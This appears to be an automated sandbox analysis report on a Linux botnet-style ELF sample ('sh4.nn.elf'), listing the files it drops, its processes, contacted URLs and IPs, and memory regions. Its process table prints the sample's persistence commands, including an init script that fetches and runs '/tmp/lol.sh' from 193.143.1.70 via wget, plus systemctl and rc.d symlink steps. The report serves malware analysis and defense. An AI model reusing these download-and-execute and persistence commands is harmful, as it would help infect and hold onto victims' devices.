Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sh4.nn.elf
|
ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sh4.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/run/user/127/dconf/user
|
very short file (no magic)
|
dropped
|
||
|
/tmp/qemu-open.HneJv3 (deleted)
|
data
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/sh4.nn.elf
|
/tmp/sh4.nn.elf
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sh4.nn.elf
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/tmp/sh4.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 45 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
33.26.230.42
|
unknown
|
United States
|
||
|
78.30.239.32
|
unknown
|
Russian Federation
|
||
|
41.156.59.73
|
unknown
|
South Africa
|
||
|
61.50.52.198
|
unknown
|
China
|
||
|
195.112.179.79
|
unknown
|
Germany
|
||
|
40.92.231.71
|
unknown
|
United States
|
||
|
130.137.13.40
|
unknown
|
United States
|
||
|
116.29.171.31
|
unknown
|
China
|
||
|
212.92.113.245
|
unknown
|
Netherlands
|
||
|
116.178.93.110
|
unknown
|
China
|
||
|
144.42.175.143
|
unknown
|
United States
|
||
|
175.90.105.135
|
unknown
|
China
|
||
|
73.248.85.148
|
unknown
|
United States
|
||
|
134.47.159.96
|
unknown
|
Norway
|
||
|
51.184.253.45
|
unknown
|
United States
|
||
|
65.165.121.141
|
unknown
|
United States
|
||
|
31.74.157.120
|
unknown
|
United Kingdom
|
||
|
128.238.11.177
|
unknown
|
United States
|
||
|
145.251.104.22
|
unknown
|
Sweden
|
||
|
103.78.178.185
|
unknown
|
China
|
||
|
88.48.11.12
|
unknown
|
Italy
|
||
|
111.180.18.214
|
unknown
|
China
|
||
|
155.158.109.211
|
unknown
|
Poland
|
||
|
53.86.250.130
|
unknown
|
Germany
|
||
|
131.238.50.89
|
unknown
|
United States
|
||
|
198.144.8.226
|
unknown
|
United States
|
||
|
114.209.215.80
|
unknown
|
China
|
||
|
188.247.242.134
|
unknown
|
Romania
|
||
|
190.68.254.237
|
unknown
|
Colombia
|
||
|
94.165.75.135
|
unknown
|
Italy
|
||
|
146.86.54.89
|
unknown
|
United States
|
||
|
143.220.197.68
|
unknown
|
United States
|
||
|
141.193.77.126
|
unknown
|
United States
|
||
|
85.233.60.239
|
unknown
|
Germany
|
||
|
143.169.48.221
|
unknown
|
Belgium
|
||
|
119.179.50.248
|
unknown
|
China
|
||
|
36.194.243.160
|
unknown
|
China
|
||
|
216.64.95.85
|
unknown
|
United States
|
||
|
140.20.178.112
|
unknown
|
United States
|
||
|
195.173.231.185
|
unknown
|
United Kingdom
|
||
|
176.61.145.45
|
unknown
|
Portugal
|
||
|
200.82.145.138
|
unknown
|
Venezuela
|
||
|
110.229.72.58
|
unknown
|
China
|
||
|
168.145.92.200
|
unknown
|
United States
|
||
|
37.213.175.86
|
unknown
|
Belarus
|
||
|
26.80.80.7
|
unknown
|
United States
|
||
|
204.97.20.60
|
unknown
|
United States
|
||
|
26.30.44.65
|
unknown
|
United States
|
||
|
94.17.189.117
|
unknown
|
Malta
|
||
|
169.94.92.133
|
unknown
|
United States
|
||
|
217.127.23.17
|
unknown
|
Spain
|
||
|
149.191.112.141
|
unknown
|
United Kingdom
|
||
|
111.43.171.252
|
unknown
|
China
|
||
|
118.122.130.100
|
unknown
|
China
|
||
|
193.245.118.229
|
unknown
|
Belgium
|
||
|
139.148.79.99
|
unknown
|
China
|
||
|
87.15.12.125
|
unknown
|
Italy
|
||
|
182.41.153.59
|
unknown
|
China
|
||
|
155.43.168.136
|
unknown
|
United States
|
||
|
104.163.117.94
|
unknown
|
Canada
|
||
|
210.11.122.188
|
unknown
|
Australia
|
||
|
92.26.83.163
|
unknown
|
United Kingdom
|
||
|
125.99.187.192
|
unknown
|
India
|
||
|
149.124.158.24
|
unknown
|
United States
|
||
|
119.106.214.101
|
unknown
|
Japan
|
||
|
141.56.73.192
|
unknown
|
Germany
|
||
|
23.6.0.211
|
unknown
|
United States
|
||
|
141.67.203.57
|
unknown
|
Germany
|
||
|
191.214.78.64
|
unknown
|
Brazil
|
||
|
2.3.102.253
|
unknown
|
France
|
||
|
38.255.28.227
|
unknown
|
United States
|
||
|
181.41.89.53
|
unknown
|
Guyana
|
||
|
33.123.247.21
|
unknown
|
United States
|
||
|
104.61.234.82
|
unknown
|
United States
|
||
|
147.140.47.69
|
unknown
|
United States
|
||
|
88.68.140.65
|
unknown
|
Germany
|
||
|
83.249.254.172
|
unknown
|
Sweden
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
22.48.158.87
|
unknown
|
United States
|
||
|
46.35.2.234
|
unknown
|
France
|
||
|
197.20.58.142
|
unknown
|
Tunisia
|
||
|
209.194.91.220
|
unknown
|
United States
|
||
|
177.153.173.40
|
unknown
|
Brazil
|
||
|
215.110.34.93
|
unknown
|
United States
|
||
|
94.143.54.245
|
unknown
|
Russian Federation
|
||
|
213.13.64.106
|
unknown
|
Portugal
|
||
|
62.234.244.187
|
unknown
|
China
|
||
|
201.92.11.186
|
unknown
|
Brazil
|
||
|
146.255.202.89
|
unknown
|
Russian Federation
|
||
|
53.146.47.251
|
unknown
|
Germany
|
||
|
219.250.248.116
|
unknown
|
Korea Republic of
|
||
|
133.66.208.93
|
unknown
|
Japan
|
||
|
141.221.141.104
|
unknown
|
United States
|
||
|
48.19.101.102
|
unknown
|
United States
|
||
|
202.107.191.68
|
unknown
|
China
|
||
|
5.117.253.246
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
120.115.138.97
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
129.131.23.31
|
unknown
|
United States
|
||
|
133.231.146.242
|
unknown
|
Japan
|
||
|
109.176.209.168
|
unknown
|
United Kingdom
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f01d0419000
|
page execute read
|
|
||
|
7f02567d2000
|
page read and write
|
|||
|
7f0257acd000
|
page read and write
|
|||
|
7f01d0429000
|
page read and write
|
|||
|
7f0250021000
|
page read and write
|
|||
|
5580510b3000
|
page read and write
|
|||
|
7f0256fd5000
|
page read and write
|
|||
|
7f0257272000
|
page read and write
|
|||
|
7f0257ad5000
|
page read and write
|
|||
|
7f0256fe3000
|
page read and write
|
|||
|
7f01d042d000
|
page read and write
|
|||
|
7f02579a4000
|
page read and write
|
|||
|
55804cf35000
|
page execute read
|
|||
|
55804d153000
|
page read and write
|
|||
|
7fff7af6a000
|
page read and write
|
|||
|
7f0257b1a000
|
page read and write
|
|||
|
55804f168000
|
page read and write
|
|||
|
7fff7afd2000
|
page execute read
|
|||
|
7f0250000000
|
page read and write
|
|||
|
55804d14b000
|
page read and write
|
|||
|
55804f151000
|
page execute and read and write
|
|||
|
7f0257659000
|
page read and write
|
|||
|
7f0257634000
|
page read and write
|
There are 13 hidden memdumps, click here to show them.